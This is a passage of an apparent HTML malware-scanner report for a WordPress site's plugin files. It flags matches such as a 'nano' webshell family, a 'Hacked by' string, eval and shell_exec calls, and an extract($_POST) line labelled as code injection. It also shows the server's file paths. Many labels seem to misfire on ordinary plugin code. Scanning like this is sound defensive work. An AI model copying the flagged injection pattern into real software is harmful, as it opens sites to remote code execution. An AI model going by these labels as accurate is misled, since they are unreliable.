<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3575</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_47").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/OLERead.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_48" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit hacked_by <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hacker credits</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Hacked&nbsp;by</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_48").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/File.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.87 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_49" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_49").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/helpers/functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_50" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval&nbsp;(</span><span style="color: #DD0000">"return&nbsp;(</span><span style="color: #0000BB">$str</span><span style="color: #DD0000">);"</span><span style="color: #007700">))&nbsp;?&nbsp;</span><span style="color: #0000BB">$then&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$else</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'is_empty'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">is_empty</span><span style="color: #007700">(</span><span style="color: #0000BB">$var</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;empty(</span><span style="color: #0000BB">$var</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi_human_filesize'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">pmxi_human_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$decimals&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$sz&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'BKMGTP'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$factor&nbsp;</span><span style="color: #007700">=&nbsp;(int)&nbsp;</span><span style="color: #0000BB">floor</span><span style="color: #007700">((</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">)&nbsp;/&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">sprintf</span><span style="color: #007700">(</span><span style="color: #DD0000">"%.</span><span style="color: #007700">{</span><span style="color: #0000BB">$decimals</span><span style="color: #007700">}</span><span style="color: #DD0000">f"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$bytes&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">pow</span><span style="color: #007700">(</span><span style="color: #0000BB">1024</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$factor</span><span style="color: #007700">))&nbsp;.&nbsp;(isset(</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$factor</span><span style="color: #007700">])&nbsp;?&nbsp;</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$factor</span><span style="color: #007700">]&nbsp;:&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi_get_remote_image_ext'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">pmxi_get_remote_image_ext</span><span style="color: #007700">(</span><span style="color: #0000BB">$fil</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_50").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/actions/wp_ajax_import_failed.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 799.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_51" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit extract_global <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">extract</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_51").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/wp-all-import/controllers/controller/admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.84 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_52" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$str'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;"http://"&nbsp;==&nbsp;$str&nbsp;||&nbsp;"ftp://"&nbsp;==&nbsp;$str&nbsp;?&nbsp;""&nbsp;:&nbsp;$str;'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">input</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">addFilter</span><span style="color: #007700">(</span><span style="color: #0000BB">$filter</span><span style="color: #007700">);&nbsp;}&nbsp;global&nbsp;</span><span style="color: #0000BB">$wp_styles</span><span style="color: #007700">;&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">is_a</span><span style="color: #007700">(</span><span style="color: #0000BB">$wp_styles</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'WP_Styles'</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$wp_styles&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">WP_Styles</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'jquery-ui'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/js/jquery/css/redmond/jquery-ui.css'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'jquery-tipsy'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/js/jquery/css/smoothness/jquery.tipsy.css'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi-admin-style'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">WP_ALL_IMPORT_ROOT_URL&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/static/css/a...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_52").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/views/tools/diagnostics/inc.settings.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.61 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_53" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_53").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/ctrls/ctrl.s1.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_54" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ERR_SHELLEXEC_ZIPOPEN</span><span style="color: #007700">.</span><span style="color: #DD0000">":&nbsp;</span><span style="color: #0000BB">$stderr</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">"&lt;br/&gt;&lt;br/&gt;&lt;b&gt;To&nbsp;resolve&nbsp;error&nbsp;see&nbsp;&lt;a&nbsp;href='https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q'&nbsp;target='_blank'&gt;https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q&lt;/a&gt;&lt;/b&gt;"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">error</span><span style="color: #007700">(</span><span style="color: #0000BB">$zip_err_msg</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"&lt;&lt;&lt;&nbsp;Shell-Exec&nbsp;Unzip&nbsp;Complete."</span><span style="color: #007700">);&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'ziparchive'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"\n\nSTART&nbsp;ZIP&nbsp;FILE&nbsp;EXTRACTION&nbsp;STANDARD&nbsp;&gt;&gt;&gt;&nbsp;"</span><span style="color: #007700">);&nbsp;if&nbsp;(!class...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">SUHOSIN</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_54").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/views/view.s1.base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 59.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_55" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_55").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/assets/inc.libs.js.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 527.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_56" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'('</span><span style="color: #007700">+</span><span style="color: #0000BB">text</span><span style="color: #007700">+</span><span style="color: #DD0000">')'</span><span style="color: #007700">);return&nbsp;</span><span style="color: #0000BB">typeof&nbsp;filter</span><span style="color: #007700">===</span><span style="color: #DD0000">'function'</span><span style="color: #007700">?</span><span style="color: #0000BB">walk</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,</span><span style="color: #0000BB">j</span><span style="color: #007700">):</span><span style="color: #0000BB">j</span><span style="color: #007700">;}<br />throw&nbsp;new&nbsp;</span><span style="color: #0000BB">SyntaxError</span><span style="color: #007700">(</span><span style="color: #DD0000">'parseJSON'</span><span style="color: #007700">);}};}();}<br />&lt;/</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /><br />&lt;</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /></span><span style="color: #FF8000">/**<br />&nbsp;*&nbsp;password_strength_plugin.js<br />&nbsp;*&nbsp;Copyright&nbsp;(c)&nbsp;20010&nbsp;myPocket&nbsp;technologies&nbsp;(www.mypocket-technologies.com)<br />&nbsp;*&nbsp;@author&nbsp;Darren&nbsp;Mason&nbsp;(djmason9@gmail.com)<br />&nbsp;*&nbsp;@date&nbsp;3/13/2009<br />&nbsp;*&nbsp;@projectDescription&nbsp;Password&nbsp;Strength&nbsp;Meter&nbsp;is&nbsp;a&nbsp;jQuery&nbsp;plug-in&nbsp;provide&nbsp;you&nbsp;smart&nbsp;algorithm&nbsp;to&nbsp;detect&nbsp;a&nbsp;password&nbsp;strength.&nbsp;<br />&nbsp;*&nbsp;Based&nbsp;on&nbsp;Firas&nbsp;Kassem&nbsp;orginal&nbsp;plugin&nbsp;-&nbsp;phiras.wordpress.com/20...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)))if(</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]){if(</span><span style="color: #0000BB">9</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">){if(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">),!</span><span style="color: #0000BB">h</span><span style="color: #007700">||!</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">parentNode</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">;if(</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else&nbsp;if(</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">&amp;&amp;(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">))&amp;&amp;</span><span style="color: #0000BB">t</span><span style="color: #007700">(</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">h</span><span style="color: #007700">)&amp;&amp;</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else{if(</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByTagName</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">;if((</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&amp;&amp;</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">}if(</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">qsa</span><span style="color: #007700">&amp;&amp;(!</span><span style="color: #0000BB">q</span><span style="color: #007700">||!</span><span style="color: #0000BB">q</span><span style="color: #007700">.</span><span style="color: #0000BB">test</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">))){if(</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">u</span><span style="color: #007700">,</span><span style="color: #0000BB">w</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">x</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">!==</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #DD0000">"object"</span><span style="color: #007700">!==</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">nodeName</span><span style="color: #007700">.</span><span style="color: #0000BB">toLowerCase</span><span style="color: #007700">()){</span><span style="color: #0000BB">o</span><span style="color: #007700">=</span><span style="color: #0000BB">g</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">),(</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">"id"</span><span style="color: #007700">))?</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(</span><span style="color: #0000BB">bb</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">c</span><span style="color: #007700">,</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">e</span><span style="color: #007700">,</span><span style="color: #0000BB">f</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span>
</span>
